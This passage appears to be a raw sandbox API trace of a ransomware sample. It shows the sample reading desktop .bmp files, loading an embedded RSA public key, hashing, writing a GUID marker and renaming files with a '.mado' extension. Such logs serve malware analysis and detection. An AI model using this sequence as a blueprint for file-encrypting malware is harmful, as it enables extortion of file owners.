dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.962] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.962] GetLastError () returned 0x0 [0204.962] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.962] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.962] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.962] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.962] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa2b0) returned 0x3b81690 [0204.962] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80ff0 [0204.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81038 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.963] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe5b0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe598 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6edb0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eec8 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.964] GetCurrentThreadId () returned 0x600 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68108 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.964] GetCurrentThreadId () returned 0x600 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.966] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa2a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.966] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.966] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.966] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.966] CloseHandle (hObject=0x63c) returned 1 [0204.967] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\VROdpB54C9PpCUk8uSl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\vrodpb54c9ppcuk8usl.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\VROdpB54C9PpCUk8uSl.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\vrodpb54c9ppcuk8usl.bmp.mado")) returned 1 [0204.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.967] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.968] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5274c890, ftCreationTime.dwHighDateTime=0x1d5e613, ftLastAccessTime.dwLowDateTime=0x92c43d90, ftLastAccessTime.dwHighDateTime=0x1d5e1cc, ftLastWriteTime.dwLowDateTime=0x92c43d90, ftLastWriteTime.dwHighDateTime=0x1d5e1cc, nFileSizeHigh=0x0, nFileSizeLow=0x10779, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wtOOF2e1.bmp", cAlternateFileName="")) returned 1 [0204.968] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\wtOOF2e1.bmp") returned=".bmp" [0204.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\wtOOF2e1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\wtoof2e1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.969] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67449) returned 1 [0204.969] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.972] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10753, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.972] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.973] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10779, lpOverlapped=0x0) returned 1 [0204.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.974] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.975] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.975] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.975] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.975] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.975] GetLastError () returned 0x0 [0204.975] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.975] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.975] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.975] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.975] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10780) returned 0x3b81690 [0204.975] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81038 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81080 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.976] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe5c8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe5b0 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eec8 [0204.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eb80 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.977] GetCurrentThreadId () returned 0x600 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68198 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.977] GetCurrentThreadId () returned 0x600 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 